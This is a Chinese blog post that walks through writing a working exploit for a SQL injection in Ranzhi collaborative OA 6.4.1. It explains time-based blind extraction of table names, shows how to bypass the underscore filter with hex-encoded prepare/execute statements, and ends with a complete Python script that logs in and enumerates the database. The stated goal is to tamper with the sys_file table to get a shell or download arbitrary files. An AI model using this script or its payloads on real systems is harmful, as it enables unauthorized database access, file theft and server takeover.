然之协同系统6.4.1 SQL注入之exp编写

Author Avatar
hac425 3月 13, 2018
  • 在其它设备中阅读本文章

前言

前面已经说明了 漏洞成因,这里介绍一下 exp 的编写。

正文

为了 getshell 或者是 任意文件下载, 我们需要修改 数据库中的 前缀sys_file 表, 所以我们的利用方式如下

  • 使用 sql 注入 获取程序数据库中任何一个表名, 取得前缀 pre
  • 然后向 presys_file 中插入目标路径。

mysql 5 中可以使用 information_schema 来获取指定数据库中的表。

paste image

information_schema 中的 tables 表里面存放着整个 mysql 里面保存的表的信息, table_schema 为 表所在的数据库, table_name 为表名。

所以使用 

1
SELECT table_name FROM information_schema.tables where table_schema=database()

就可以得到 当前数据库的 所有表的表名(database() 返回当前的数据库名称)。

paste image

由于没有回显,需要使用一些 条件判断 相关的函数,这里我使用 if

1
select if(ASCII(SUBSTR((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 0,1) ,1 ,1))=16, SLEEP(3), 1)

if 的第一参数为 1 则返回第二个参数的值,否则返回 第3个参数的值.

上面的语句用到了子查询和 acsiisubstr 来对检索到的结果根据其 ascii 值进行枚举,如果枚举到了,就 sleep(3)

我们可以通过判断服务器的响应时间,来判断当前枚举位的具体值。

同时子查询只允许返回一行,所以使用 了 limit 0,1 来只返回第一条结果。

枚举表名的关键代码如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
table_name = ""
for i in range(1, table_len + 1):
    for j in range(1, 129):
        payload = get_payload_encode(
            '''select if(ASCII(SUBSTR((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 0,1) ,{} ,1))={}, SLEEP(3), 1);'''.format(
                i, j))
        start = time.time()
        requests.get(host)
        nor_time = (time.time() - start)
        start = time.time()
        requests.get(target + payload.decode("utf-8"), headers=headers, cookies=cookies)
        att_time = (time.time() - start)
        if att_time - nor_time > 2:
            table_name += chr(j)
            print(table_name)
            break

还有一个注意的就是,程序过滤了 _, 这里使用 prepareexecute 组合进行绕过,因为 mysql 支持字符串使用 16 进制编码输入。

1
2
3
4
5
def get_payload_encode(payload):
    sql = "set @query=0x{};prepare stmt from @query;execute stmt;".format(binascii.b2a_hex(payload.encode("utf-8")).decode("utf-8"))
    raw = {"orderBy": "id limit 0,1;{}#".format(sql)}
    raw = json.dumps(raw)
    return base64.b64encode(raw.encode("utf-8"))  # str---> byte   用 encode

最后的 exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
# coding=utf-8
import requests
import base64
import time
import json
import binascii
import re
import hashlib
import chardet
def get_md5(input):
    input = input.encode("utf-8")
    m = hashlib.md5()
    m.update(input)
    return m.hexdigest()
def get_payload_encode(payload):
    sql = "set @query=0x{};prepare stmt from @query;execute stmt;".format(binascii.b2a_hex(payload.encode("utf-8")).decode("utf-8"))
    raw = {"orderBy": "id limit 0,1;{}#".format(sql)}
    raw = json.dumps(raw)
    return base64.b64encode(raw.encode("utf-8"))  # str---> byte   用 encode
# get_db_name(host)
def get_table_name(host):
    path = "/cash/block-printTradeBlock.html?param="
    target = host + path
    # 查表名
    table_len = 0
    for i in range(1, 100):
        payload = get_payload_encode(
            '''select if((SELECT LENGTH(table_name)FROM information_schema.tables where table_schema=database() LIMIT 0,1)={}, SLEEP(3), 1);'''.format(
                i))
        start = time.time()
        requests.get(host)
        nor_time = (time.time() - start)
        start = time.time()
        requests.get(target + payload.decode("utf-8"), headers=headers, cookies=cookies)
        att_time = (time.time() - start)
        if att_time - nor_time > 2:
            table_len = i
            break
    print("db_len: %d" %(table_len))
    table_name = ""
    for i in range(1, table_len + 1):
        for j in range(1, 129):
            payload = get_payload_encode(
                '''select if(ASCII(SUBSTR((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 0,1) ,{} ,1))={}, SLEEP(3), 1);'''.format(
                    i, j))
            start = time.time()
            requests.get(host)
            nor_time = (time.time() - start)
            start = time.time()
            requests.get(target + payload.decode("utf-8"), headers=headers, cookies=cookies)
            att_time = (time.time() - start)
            if att_time - nor_time > 2:
                table_name += chr(j)
                print(table_name)
                break
def login(url, username , password):
    target = url + "/sys/user-login.html"
    data = {"account": "admin", "password": "d4dba0bc2f7e946feaeacbdcdc167131",
                  "referer": "http://hack.ranzhi.top/sys/index.html", "rawPassword": "21232f297a57a5a743894a0e4a801fc3",
                  "keepLogin": "false"}
    res = requests.get(target, headers=headers)
    cookies['rid'] = res.cookies['rid']
    random = re.findall('v\.random = "(.*?)";', res.text)[0]
    # 生成登录需要的数据
    data['account'] = username
    data['referer'] = target
    data['rawPassword'] = get_md5(password)
    data['password'] = get_md5(get_md5(get_md5(password) + username) + random)
    res = requests.post(target, headers=headers, cookies=cookies, data=data)
    if "self.location" in res.content.decode("utf-8"):
        print("登录成功,下面开始 exploit")
    else:
        print("登录失败")
        exit(0)
if __name__ == '__main__':
    proxies = {"http": "http://127.0.0.1:8080", "https": "https://127.0.0.1:8080", }
    cookies = {"lang": "zh-cn", "theme": "default", "keepLogin": "false", "rid": "6n6panbh36uqiqj4k5o0nbscq2",
               " XDEBUG_SESSION": "19857"}
    headers = {"Pragma": "no-cache", "Cache-Control": "no-cache", "Upgrade-Insecure-Requests": "1",
               "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36",
               "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
               "Referer": "http://hack.ranzhi.top/sys/index.php", "Accept-Encoding": "gzip, deflate",
               "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
    host = "http://hack.ranzhi.top:80/"
    # get_table_name(host)
    login(host, "test", "111111")
    get_table_name(host)

本站文章均原创, 转载注明来源
本文链接:http://blog.hac425.top/2018/03/13/ranzhi_oa_641_exp.html